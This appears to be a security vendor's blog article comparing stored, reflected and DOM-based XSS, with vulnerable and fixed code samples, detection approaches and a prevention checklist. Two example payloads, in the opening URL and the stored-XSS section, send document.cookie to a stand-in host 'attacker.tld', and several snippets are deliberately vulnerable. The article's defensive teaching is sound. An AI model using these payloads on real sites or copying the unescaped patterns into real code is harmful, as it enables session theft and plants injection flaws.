Stored vs Reflected XSS: Two Attacks, Different Detection
In 2014, attackers planted JavaScript inside eBay product listings, and it ran in the browser of every shopper who clicked through. The payload sat in the listing description field, which eBay rendered as HTML, and it stayed there for months while attackers used it to harvest session cookies and redirect victims to credential-stealing pages. That is stored XSS in one sentence: a payload that lives on the server and detonates in every visitor's browser. Compare it to this URL, which probably looks familiar:
https://shop.example.com/search?q=<script>fetch('//attacker.tld/?c='+document.cookie)</script>

That is reflected XSS: a payload that lives in the request, gets echoed back into the response, and only fires when somebody clicks the link. Both end with attacker-controlled JavaScript executing inside your origin. The mechanics overlap, the impact differs, and the detection strategies diverge in ways that matter when you are picking tools or writing remediation guidance.
The Mechanic in One Paragraph
Every XSS variant collapses to the same root cause. The application receives data from somewhere it does not control, drops that data into an HTML response without escaping it for the surrounding context, and the browser parses the result and executes whatever JavaScript it finds. Because the script runs inside the application's origin, it inherits the user's session cookies, can call any same-origin endpoint, and can read the DOM of any page on that origin. The attacker steals what the legitimate user can do: session tokens, CSRF tokens, form contents, anything reachable from the same browsing context. The distinction between stored, reflected, and DOM-based is just where the unsafe data enters the pipeline and how it reaches the sink.
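To make the escaping half of that pipeline concrete, here is a minimal Python sketch (variable names are illustrative) showing the same user input interpolated raw, where a browser would parse it as a live script tag, and entity-encoded, where the parser treats it as inert text:

```python
import html

user_input = "<script>alert(1)</script>"

# Unsafe: raw interpolation into HTML body context
unsafe_fragment = f"<h1>Results for: {user_input}</h1>"

# Safe: entity-encode <, >, &, and quotes for HTML body context
safe_fragment = f"<h1>Results for: {html.escape(user_input, quote=True)}</h1>"

print(unsafe_fragment)  # <h1>Results for: <script>alert(1)</script></h1>
print(safe_fragment)    # <h1>Results for: &lt;script&gt;alert(1)&lt;/script&gt;</h1>
```

Note the qualifier "for HTML body context": the same value dropped into an attribute, a JavaScript string, or a URL needs a different encoding, which is why framework helpers beat hand-rolled escaping.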
Reflected XSS
Reflected XSS is the URL-parameter case. Something in the request — a query string, a form field, a header echoed into an error page — ends up in the HTML response without encoding. The attack requires delivery: the victim has to click a crafted link, scan a poisoned QR code, or load a page that submits a hidden form to the vulnerable endpoint. Here is the canonical search-page bug in PHP:
```php
<?php
$query = $_GET['q'];
echo "<h1>Results for: $query</h1>";
?>
```

Visit /search.php?q=<script>alert(1)</script> and the browser parses the script tag exactly as written. The fix is context-aware output encoding — for HTML body context, that means HTML-entity-encoding the angle brackets and ampersands so the parser treats them as text:
```php
<?php
$query = $_GET['q'];
echo "<h1>Results for: " . htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "</h1>";
?>
```

The same bug in Express looks like this, and the fix is the same idea expressed through a templating engine that auto-escapes by default:
```javascript
// Vulnerable: raw concatenation into the response
app.get('/search', (req, res) => {
  res.send(`<h1>Results for: ${req.query.q}</h1>`);
});

// Fixed: render through a template that escapes by default
app.get('/search', (req, res) => {
  res.render('search', { q: req.query.q }); // Pug, EJS with <%= %>, etc.
});
```

Modern frameworks default to escaping for a reason. The bugs that survive into production are usually the ones where someone reached past the safe API — v-html in Vue, dangerouslySetInnerHTML in React, raw triple-mustache ({{{ }}}) in Handlebars — to render data that they believed was trusted but wasn't.
Stored XSS
Stored XSS skips the delivery problem. The payload goes into the database, and every user who loads the affected page gets it, automatically. Comment fields, profile bios, product reviews, support tickets, chat messages, anything where one user's input is shown to another user is a candidate. Here is a Flask comment endpoint that stores raw HTML and renders it back without escaping:
```python
@app.route('/comments', methods=['POST'])
def add_comment():
    body = request.form['body']
    post_id = request.form['post_id']
    db.execute('INSERT INTO comments (post_id, body) VALUES (?, ?)', (post_id, body))
    return redirect(f'/post/{post_id}')

@app.route('/post/<int:post_id>')
def view_post(post_id):
    rows = db.execute('SELECT body FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    html = '<ul>'
    for row in rows:
        html += f'<li>{row["body"]}</li>'  # raw interpolation
    html += '</ul>'
    return html
```

Submit <img src=x onerror="fetch('//attacker.tld/?c='+document.cookie)"> as a comment and every subsequent visitor to that post ships their session cookie to the attacker. The fix is to render through Jinja's autoescape, which is the default when templates have an .html extension:
```python
@app.route('/post/<int:post_id>')
def view_post(post_id):
    rows = db.execute('SELECT body FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    return render_template('post.html', comments=rows)
```

```html
<!-- templates/post.html -->
<ul>{% for c in comments %}<li>{{ c.body }}</li>{% endfor %}</ul>
```

If the application genuinely needs to render user-supplied HTML — a rich-text editor, a markdown preview — the right tool is a sanitization library that parses the HTML, walks the parse tree, and strips anything not on a strict allowlist. DOMPurify on the client, bleach in Python, HtmlSanitizer in .NET. Regex-based filtering is a known dead end; the parser will always find a payload your regex didn't anticipate.
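To show what parse-and-allowlist means in about thirty lines, here is a deliberately toy sketch built on the standard library's HTMLParser — keep allowlisted tags, drop every attribute, escape everything else. It exists only to illustrate the shape of the approach; in production use a maintained library like DOMPurify or bleach, not this:

```python
from html.parser import HTMLParser
from html import escape

# Illustrative allowlist -- a real policy would be driven by product needs
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "ul", "li"}

class AllowlistSanitizer(HTMLParser):
    """Toy sanitizer: keeps allowlisted tags, drops ALL attributes,
    entity-encodes text. Do not use in production."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes dropped: no onerror, no href

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))    # text content becomes inert entities

def sanitize(dirty: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(dirty)
    parser.close()
    return "".join(parser.out)

payload = '<li><img src=x onerror="fetch(\'//attacker.tld\')"><b>hi</b></li>'
print(sanitize(payload))  # <li><b>hi</b></li>
```

The point of the sketch is structural: decisions are made on parsed tags, not on string patterns, so there is no regex for an attacker's parser tricks to slip past.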
Why Stored Is Usually Worse
Reflected XSS needs a delivery mechanism. The attacker has to convince the victim to click a link, and the link itself often looks suspicious enough to filter on, train against, or block at the email gateway. Stored XSS needs nothing. The victim visits a page they would have visited anyway — the product they bought, the support thread they filed, the profile of someone they follow — and the payload runs. Every authenticated user who loads the affected view is exploited automatically, which means the blast radius scales with traffic and the dwell time can be measured in months. Brand damage is also worse: stored XSS often manifests as visible defacement or unauthorized redirects, which surface in user complaints and press coverage long before any incident response team identifies the root cause.
DOM-Based XSS
The third category lives entirely in the browser. The server never sees the payload; the JavaScript on the page reads attacker-controlled data from a source like location.hash, document.referrer, or postMessage, and writes it to a sink like innerHTML, document.write, or eval. The classic example:
```javascript
// Vulnerable: hash fragment goes straight into innerHTML
document.getElementById('greeting').innerHTML = 'Hello, ' + location.hash.slice(1);

// Fixed: textContent treats the value as text, not markup
document.getElementById('greeting').textContent = 'Hello, ' + location.hash.slice(1);
```

DOM XSS is harder for server-side scanners and proxies to see, because the dangerous data flow happens after the response leaves the server. Detection requires either static analysis of the client-side bundle or a DAST tool that executes JavaScript and instruments DOM sinks at runtime. SPAs that route on the URL fragment and render through innerHTML are the prototypical risk.
Detection
SAST detects XSS by tracing data flow from sources (HTTP request parameters, cookies, headers, database reads of user-supplied content) to sinks (HTML response writers, template raw-output directives, innerHTML, document.write). When the path from source to sink does not pass through a recognized encoding or sanitization function, the analyzer flags the issue with the full taint path attached. This is what data flow analysis buys you over pattern matching: a regex sees that request.form['body'] appears in the file; a taint engine sees that the same value reaches an unescaped HTML write three function calls later.
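The source-to-sink idea can be caricatured in a few lines of Python. This is a drastically simplified dynamic sketch — a real taint engine analyzes a program's intermediate representation statically rather than wrapping live values — but it shows the three moving parts: taint enters at a source, survives string operations, and is cleared only by a recognized encoder before reaching a sink:

```python
import html

class Tainted(str):
    """A string flagged as attacker-controlled; concatenation propagates the flag."""
    def __add__(self, other):
        return Tainted(str.__add__(self, other))
    def __radd__(self, other):
        return Tainted(str.__add__(str(other), self))

def source(value):
    # Models a source: request parameter, cookie, stored user content
    return Tainted(value)

def sanitize(value):
    # Models a recognized encoder: returns a plain str, clearing the taint
    return str(html.escape(value, quote=True))

def html_sink(fragment):
    # Models a sink: a raw HTML response write
    if isinstance(fragment, Tainted):
        raise ValueError("XSS: tainted data reached an HTML sink unescaped")
    return fragment

q = source("<script>alert(1)</script>")
safe_page = html_sink("<h1>" + sanitize(q) + "</h1>")  # fine: taint cleared
# html_sink("<h1>" + q + "</h1>")  # would raise: taint propagated to the sink
```

The static version of this is what the taint path in a SAST finding represents: the chain of assignments and calls along which the Tainted flag would have traveled.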
DAST takes the runtime approach. The scanner submits a library of XSS payloads against every discovered parameter, then inspects responses for evidence of reflection or stored persistence. Headless-browser DAST also instruments the DOM to detect client-side sinks. Both approaches have well-known coverage gaps: SAST struggles with reflective frameworks where the data flow is dynamic, DAST struggles with payloads that require multi-step state to surface. Content Security Policy with script-src 'self' 'nonce-...' is not detection at all — it is a runtime mitigation that prevents inline-script payloads from executing even when the underlying bug ships. Treat CSP as defense in depth, not as a substitute for fixing the source.
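Nonce-based CSP is cheap to generate. The sketch below shows only the per-request pieces — a fresh nonce, the policy string, and the matching script tag — with framework wiring and directive choices beyond script-src left as assumptions:

```python
import secrets

def csp_for_request():
    # A fresh, unguessable nonce must be generated for every response;
    # reusing one defeats the protection.
    nonce = secrets.token_urlsafe(16)
    policy = f"script-src 'self' 'nonce-{nonce}'; object-src 'none'; base-uri 'none'"
    return nonce, policy

nonce, policy = csp_for_request()

# The same nonce goes into the response header and onto every legitimate script tag:
header = ("Content-Security-Policy", policy)
script_tag = f'<script nonce="{nonce}" src="/static/app.js"></script>'
# An injected <script> carries no valid nonce, so the browser refuses to run it.
```

The object-src and base-uri directives are shown as common hardening companions, not as requirements; the load-bearing part is the per-request nonce in script-src.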
Prevention Checklist
- Output-encode in the right context. HTML body, HTML attribute, JavaScript string, URL, and CSS each require a different encoding. Get this from your framework's helpers, not by hand.
- Trust your template engine's auto-escape. Reach for v-html, dangerouslySetInnerHTML, or raw template directives only when you have parsed and sanitized the input first.
- Sanitize on output, not on input. Storage-time filtering breaks legitimate use of angle brackets in text and creates a false sense of safety; the right defense lives at the rendering boundary.
- Deploy a strict Content Security Policy. script-src 'self' 'nonce-{random}' blocks the most common payload styles even when an XSS bug ships.
- Mark cookies HttpOnly, Secure, and SameSite. HttpOnly takes document.cookie off the table for session theft; SameSite limits CSRF chaining off the back of an XSS.
- Use a maintained sanitizer for rich-text input. DOMPurify, bleach, HtmlSanitizer — never roll your own with regex.
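The cookie flags from the checklist can be assembled with nothing but the standard library (Python 3.8+ for SameSite support in http.cookies; web frameworks expose the same knobs under their own names):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "opaque-token-value"
cookie["session"]["httponly"] = True   # document.cookie can no longer read it
cookie["session"]["secure"] = True     # never sent over plain HTTP
cookie["session"]["samesite"] = "Lax"  # limits cross-site request chaining
cookie["session"]["path"] = "/"

header = cookie.output()
print(header)  # a Set-Cookie header carrying HttpOnly, Secure, and SameSite=Lax
```

HttpOnly does not prevent XSS — an injected script can still act as the user within the page — but it removes outright session-token theft from the payoff.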
How GraphNode Handles This
GraphNode SAST traces reflected, stored, and DOM-based XSS through full data flow analysis across method boundaries, with sanitization detection that prevents false positives when input has already passed through a recognized encoder. Coverage spans 13+ languages including PHP, JavaScript, Python, Java, C#, Swift, and Kotlin, with rules mapped to OWASP Top 10 and CWE. For the broader injection-class context, see the A03 injection guide.
Closing
Stored and reflected XSS share a root cause and split on delivery. Reflected needs a click; stored needs a page view. Both kill the same way once they fire, which is why the prevention story is mostly the same — encode at the boundary, trust your framework, sanitize when you must render markup, and layer CSP underneath as the safety net for the bug you missed. The detection story splits cleanly: trace the taint at commit time so the bug never reaches a deployed environment, then let DAST and CSP catch what slipped through.
GraphNode SAST traces user input from request to template sink across 13+ languages — request a demo.